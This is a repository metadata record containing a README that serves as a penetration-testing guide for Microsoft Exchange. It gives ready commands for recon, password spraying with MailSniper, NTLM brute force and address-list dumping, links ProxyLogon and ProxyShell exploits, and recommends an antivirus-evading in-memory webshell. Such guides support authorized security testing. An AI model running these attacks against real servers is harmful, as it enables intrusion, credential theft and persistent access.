{"id":49471858,"url":"https://github.com/kh4sh3i/exchange-penetration-testing","last_synced_at":"2026-04-30T16:36:57.740Z","repository":{"id":41458112,"uuid":"506610379","full_name":"kh4sh3i/exchange-penetration-testing","owner":"kh4sh3i","description":"The great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)","archived":false,"fork":false,"pushed_at":"2026-03-26T13:31:18.000Z","size":6552,"stargazers_count":135,"open_issues_count":1,"forks_count":29,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-04-30T16:36:51.600Z","etag":null,"topics":["exchange","exchange-server","exploit","mail","pentest","pentest-tool","pentesting","redteam","zeroday"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"cc0-1.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kh4sh3i.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-06-23T11:21:45.000Z","updated_at":"2026-04-10T12:22:23.000Z","dependencies_parsed_at":"2025-08-15T13:23:33.554Z","dependency_job_id":null,"html_url":"https://github.com/kh4sh3i/exchange-penetration-testing","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/kh4sh3i/exchange-penetration-testing","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kh4sh3i","download_url":"https://codeload.github.com/kh4sh3i/exchange-penetration-testing/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kh4sh3i%2Fexchange-penetration-testing/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32470879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-30T13:12:12.517Z","status":"ssl_error","status_checked_at":"2026-04-30T13:12:06.837Z","response_time":57,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exchange","exchange-server","exploit","mail","pentest","pentest-tool","pentesting","redteam","zeroday"],"created_at":"2026-04-30T16:36:55.982Z","updated_at":"2026-04-30T16:36:57.735Z","avatar_url":"https://github.com/kh4sh3i.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# exchange penetration testing\nThe great Microsoft exchange hack: A penetration tester’s guide (exchange penetration testing)\n\n\n## 1) Recon\n\n* local domain name\n  * https://mail.target.ir/autodiscover/autodiscover.json\n  * X-CalculatedBETarget: exchange-01.target.local\n\n* exchange version check\n  *  https://mail.target.ir/EWS/Exchange.asmx\n  *  X-OWA-Version: 15.2.1118.9\n\n* get exchange version\n```python\nsudo python3 get_exchange_version.py https://mail.target.com\n```\n\n\n\n## 2) Bruteforce\n\n### use MailSniper enum\n\n```powershell\nImport-Module MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname mail.domain.com\n```\n\n### Password Spray\n* PasswordSprayOWA : will attempt to connect to an OWA portal and perform a password spraying attack using a userlist and a single password.\n* PasswordSprayEWS :  will attempt to connect to an EWS portal and perform a password spraying attack using a userlist and a single password.\n\n```powershell\nImport-Module MailSniper.ps1\nInvoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt\nInvoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt\n```\n\n### python NTLM password Sparay\n\n```python\npython3 bruteforce/bruteforce.py -t https://mail.domain.com/EWS/Exchange.asmx -U users.txt -p TestPassword\n```\n\n\n\n## 3) GAL \nThe Microsoft Exchange Global Address List (GAL) is a list of all end users and their respective email addresses within an Exchange Server organization that uses Microsoft Outlook for email.\n\n### use exchanger.py [impacket](https://github.com/SecureAuthCorp/impacket)\n```python\npython GAL/exchanger.py DomainName/Username:\"Password\"@mail.domain.com nspi list-tables\n```\n\n### use ruler \n```\nGAL/ruler-linux64 --url https://mail.domain.com/autodiscover/autodiscover.xml --email Username@domain.com -d DomainName -u Username -p Password --debug --verbose  abk dump --output gal.txt \n```\n\n### use ewsManage.py\n```python\npython3 GAL/ewsManage.py mail.domain.com 443 plaintext DomainName Username Password findallpeopl\n```\n\n* for export GAL we should enum valid username,password and email first !\n\n\n\n\n\n## 4) [ProxyLogon](https://github.com/kh4sh3i/ProxyLogon)\nProxyLogon is the formally generic name for CVE-2021-26855, a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication and impersonating as the admin. We have also chained this bug with another post-auth arbitrary-file-write vulnerability, CVE-2021-27065, to get code execution.\n\n\n## 5) [ProxyShell](https://github.com/kh4sh3i/ProxyShell)\nCVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability. This faulty URL normalization lets us access an arbitrary backend URL while running as the Exchange Server machine account. Although this bug is not as powerful as the SSRF in ProxyLogon, and we could manipulate only the path part of the URL\n\n\n## 6) WebShell\n* GhostWebShell (Author: Soroush Dalili (@irsdl)) only load in Ram and AV can not detect it !\n* it useful in proxylogn and proxy shell\n```\nuse GhostWebShell.cs\n```\n\n#### most famous cve\n```\ncve-2021-31206\ncve-2021-31207\ncve-2021-34473\ncve-2021-34523\ncve-2021-26855\ncve-2021-26857\ncve-2021-26858\ncve-2021-27065\ncve-2015-1635\n```\n\n\n\u003cimg src=\"/img/1.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/2.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/3.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/4.png\" width=\"800px\" /\u003e\n\u003cimg src=\"/img/5.png\" width=\"800px\" /\u003e\n\n### Reference\n* [proxylogon orange](https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html)\n* [proxylogon orange 2](https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html)\n* [python2](https://www.how2shout.com/linux/how-to-install-python-2-7-on-ubuntu-20-04-lts/)\n* [proxylogon](https://proxylogon.com/)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkh4sh3i%2Fexchange-penetration-testing/lists"}